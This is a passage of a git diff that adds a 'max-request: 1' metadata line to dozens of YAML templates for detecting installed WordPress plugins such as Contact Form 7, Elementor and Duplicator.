@@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git 